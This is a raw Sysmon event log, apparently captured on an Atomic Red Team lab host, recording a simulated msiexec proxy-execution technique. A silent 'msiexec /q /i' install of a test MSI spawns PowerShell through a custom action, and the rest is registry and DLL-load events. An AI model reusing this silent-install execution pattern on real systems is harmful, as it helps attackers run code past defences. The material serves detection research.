-ForceV1C:\WindowsWIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=D752C96401E2540A443C599154FC6FA9,SHA256=046F7A1B4DE67562547ED9A180A72F481FC41E803DE49A96D7D7C731964D53A0{7CF983DC-9826-62AC-346B-000000006202}3304C:\Windows\System32\cmd.exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_EXE.msi""WIN-HOST-MHAAG-\Administrator 154100x80000000000000002695131Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.317{7CF983DC-9826-62AC-346B-000000006202}3304C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"cmd.exe" /c "c:\windows\system32\msiexec.exe /q /i "C:\AtomicRedTeam\atomics\T1218.007\src\T1218.007_EXE.msi""C:\Users\ADMINI~1\AppData\Local\Temp\2\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2{7CF983DC-EEA1-62A8-9500-000000006202}4692C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" WIN-HOST-MHAAG-\Administrator 534500x80000000000000002694876Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.256{7CF983DC-9826-62AC-306B-000000006202}4688C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 534500x80000000000000002694870Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.256{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002694866Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteKey2022-06-17 15:05:10.256{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694865Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:10.256{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\OwnerNT AUTHORITY\SYSTEM 12241200x80000000000000002694864Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:10.256{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHashNT AUTHORITY\SYSTEM 12241200x80000000000000002694863Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-DeleteValue2022-06-17 15:05:10.256{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000\SequenceNT AUTHORITY\SYSTEM 12241200x80000000000000002694862Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.256{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694861Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.256{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694858Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.256{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694855Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.256{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694853Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.256{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 12241200x80000000000000002694848Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:10.256{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\RestartManager\Session0000NT AUTHORITY\SYSTEM 23542300x80000000000000002694845Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.256{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\e4f5145.msiMD5=B4DFDB4509DCB4B46CD5C654612D88BB,SHA256=16E90C61C9F253F5AB98100BA113E4E2970C3AF603F036ED12D6AE121C57B678falsetrue 23542300x80000000000000002694836Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.256{7CF983DC-981D-62AC-1A6B-000000006202}4840NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\Installer\MSI559A.tmpMD5=52E020CF3FCDD1357E769B95FB36072F,SHA256=6F2F3FE71A9673C8D9AD17517D51595182622CBD12FEEAEA93E313267CBE29BDtruetrue 734700x80000000000000002694833Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\Installer\MSI559A.tmp-----MD5=52E020CF3FCDD1357E769B95FB36072F,SHA256=6F2F3FE71A9673C8D9AD17517D51595182622CBD12FEEAEA93E313267CBE29BDfalse-UnavailableWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694829Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.256{7CF983DC-9826-62AC-316B-000000006202}42403716C:\Windows\System32\MsiExec.exe{7CF983DC-9826-62AC-326B-000000006202}3728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Installer\MSI559A.tmp+10ef|C:\Windows\System32\msi.dll+ea965|C:\Windows\System32\msi.dll+afe66|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorWIN-HOST-MHAAG-\Administrator 154100x80000000000000002694828Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.256{7CF983DC-9826-62AC-326B-000000006202}3728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -nop -Command Write-Host CustomAction export executed me; exitC:\Windows\system32\WIN-HOST-MHAAG-\Administrator{7CF983DC-EE99-62A8-FF22-070000000000}0x722ff2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\MsiExec.exe -Embedding 466E8A9CB4048C63AEC990032FAEB6F6WIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694825Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-9826-62AC-316B-000000006202}42402420C:\Windows\System32\MsiExec.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\MsiExec.exe+6bca|C:\Windows\System32\MsiExec.exe+7166|C:\Windows\System32\MsiExec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000002694824Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694823Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694822Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694821Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694820Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694819Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694818Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694817Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694816Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694815Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694814Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.241{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694813Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694812Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694811Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694810Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694809Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694808Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694807Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694806Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694805Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694804Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694803Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694802Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694801Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694800Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694799Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694798Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694797Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694796Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694795Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694794Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002694793Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-EE97-62A8-7E00-000000006202}18083404C:\Windows\system32\csrss.exe{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\MsiExec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002694792Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:10.225{7CF983DC-9826-62AC-316B-000000006202}4240C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating 